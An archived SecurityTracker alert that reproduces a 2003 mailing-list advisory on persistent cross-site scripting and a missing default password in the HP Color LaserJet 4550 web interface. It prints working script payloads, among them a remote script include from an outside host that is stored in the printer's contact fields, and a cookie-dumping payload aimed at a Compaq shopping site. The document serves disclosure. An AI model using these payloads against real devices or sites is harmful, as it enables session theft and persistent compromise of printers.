SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Device (Printer)  >   HP Printer Vendors:   HPE
HP Color LaserJet Web Interface Permits Remote Cross-Site Scripting Attacks
SecurityTracker Alert ID:  1007293
SecurityTracker URL:  http://securitytracker.com/id/1007293
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Jul 24 2003
Impact:   Disclosure of user information, Execution of arbitrary code via network, Modification of user information, User access via network
Exploit Included:  Yes  
Version(s): Color LaserJet 4550
Description:   A vulnerability was reported in the HP Color LaserJet 4550. A remote user can conduct cross-site scripting attacks. The device also is set without a password by default.

exploitlabs.com reported that the system is configured by default to have no password. Because of this, a remote user can access the web-based management interface.

It is also reported that the web interface does not filter HTML from user-supplied input. A remote user can create HTML that, when loaded by the target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the printer and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the printer, access data recently submitted by the target user via web form to the printer, or take actions on the printer acting as the target user.

Impact:   A remote user can gain access to the web-based administration interface (in the default configuration where no password has been set).

A remote user can access the target user's cookies (including authentication cookies), if any, associated with the printer, access data recently submitted by the target user via web form to the printer, or take actions on the printer acting as the target user. A remote user can also temporarily render the target user's web interface unusable.

Solution:   No solution was available at the time of this entry.
Vendor URL:  www.hp.com/ (Links to External Site)
Cause:   Configuration error, Input validation error

Message History:   None.


 Source Message Contents

Subject:  [0day] HP LaserJet 4550 - Remote XSS DoS


-= 0day - Freedom of Voice - Freedom of Choice =-

------------------------------------------------------------------
          - EXPL-A-2003-018 exploitlabs.com Advisory 018
------------------------------------------------------------------
                  -= HP Color LaserJet 4550 =-




Donnie Werner
July 22, 2003
http://exploitlabs.com



Product:
--------
Hewlet Packard Color LaserJet 4550 ( possibly others )


Vunerability(s):
----------------
1. Remote Persistant Xss DoS
2. no default password


Description of product:
-----------------------
"Designed for business professionals who want
 to communicate more effectively using high-quality,
  professional - looking color documents"




VUNERABILITY / EXPLOIT
======================

1. Remote Persistant Xss DoS
-------------------------------

The remote administration interface of the
HP Color LaserJet 4550 uses extensive javascript in
building dynamic content for administration of the
printers setup and manegment.

uhh oh..


Detail: by introducing XSS we render the remote interface useless...


Example 1.

Add Link:
 The HP allows an inclusion of a user definable link...



http://[printer-ip]/hp/device/this.LCDispatcher?update=html&cat=0&pos=0&submit=go
http://[printer-ip]/hp/device/this.LCDispatcher

as you can see the left hand menu has completly been rendered useless...
( sorry )


Device:
 LINKS:


when re-renderd we get weird out put depending on the JS used..
some examples..

http://<iframe%20src=/

" id="lnkOtherLink0" target="_blank">

http://[printer-ip]/hp/device/htt</font></a><br></p></div><div%20id=


looking at the source...

--------- snip -------------
}
document.writeln('<div id="navcap"><img border="0"
src="images/button_bottom.gif" width="140" height="21"><BR>');
string = 'Other Links';
document.writeln('<p><b>' + string + '</b><br>');
tmpString = '<a target="_blank"
href="this.LCLinkedPageImpl?LCLinkedPage=html&page=my_printer"
id="lnkHardLink0"><font face="Helvetica,Arial,Gill Sans,Sans Serif"
size="2">My Printer</font></a><br><a target="_blank"
href="this.LCDispatcher?dispatch=html&page=order_supplies"
id="lnkHardLink1"><font face="Helvetica,Arial,Gill Sans,Sans Serif"
size="2">Order Supplies</font></a><br><a target="_blank"
href="http://productfinder.support.hp.com/servlet/FindIt?q=[C7085A]&t=hp&s=
x" id="lnkHardLink2"><font face="Helvetica,Arial,Gill Sans,Sans Serif"
size="2">Solve A Problem</font></a><br>';
document.writeln(tmpString);
tmpString = '<a href="http://<script>alert("You are vunerable to xss -
discover" id="lnkOtherLink0" target="_blank"><font
face="Helvetica,Arial,Gill Sans,Sans Serif"
size="2"><script>alert("Y</font></a><br>';
document.writeln(tmpString + '</p>');
document.writeln('</div>');
mapheight = navcaptop - topofbuttons;
document.writeln('<div id="navmap"><img border="0" src="images/spacer.gif"
width="140" height="'+mapheight+'" usemap="#buttonsmap"></div>');
document.writeln('<MAP NAME="buttonsmap">');
for (var i=0; i < buttonarray.length; i++) {
document.writeln('<AREA SHAPE="rect"
COORDS="'+buttonarray[i]['mapcoords']+'",
HREF="'+buttonarray[i]['href']+'">');
}document.writeln('</MAP>');</script>
------- snip -------------

ouch!!


Example 2.

DIAGNOSTICS
 Network Statistics
 > Protocol Info
 Test Page

system contact and system location both vuln to..

<script language="JavaScript"
src="http://www.astalavista.com/backend/news.js"
type="text/javascript"></script>

which allows remote inclusion that is persistant

this  writes to the rom and is viewable even over snmp



I am assuming the only way to fix these issues
 are to upgrade the rom or reset via a CLI interface


2. no default password
-----------------------
if this was set this couldnt happen I guess.. ( oops again )



Local:
------
yes

Remote:
-------
yes

Vendor Fix:
-----------
No fix on 0day ( aww.. shucks )



Vendor Contact:
---------------
Concurrent with this advisory
support@hp.com
security@hp.com

Credits:
--------
Donnie Werner
morning_wood@exploitlabs.com
http://exploitlabs.com



===========================
EXTRA FUN WiTH HP / COMPAQ:
===========================

http://www.smb.compaq.com/dcart/cart.asp?oi=E9CED&BEID=19701&SBLID=

locate the "e-cupon" box
enter <script>document.write(document.cookie)</script>
press "Submit"
laugh "real hard"

_______________________________________________
0day mailing list
0day@nothackers.org
http://nothackers.org/mailman/listinfo/0day

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2022, SecurityGlobal.net LLC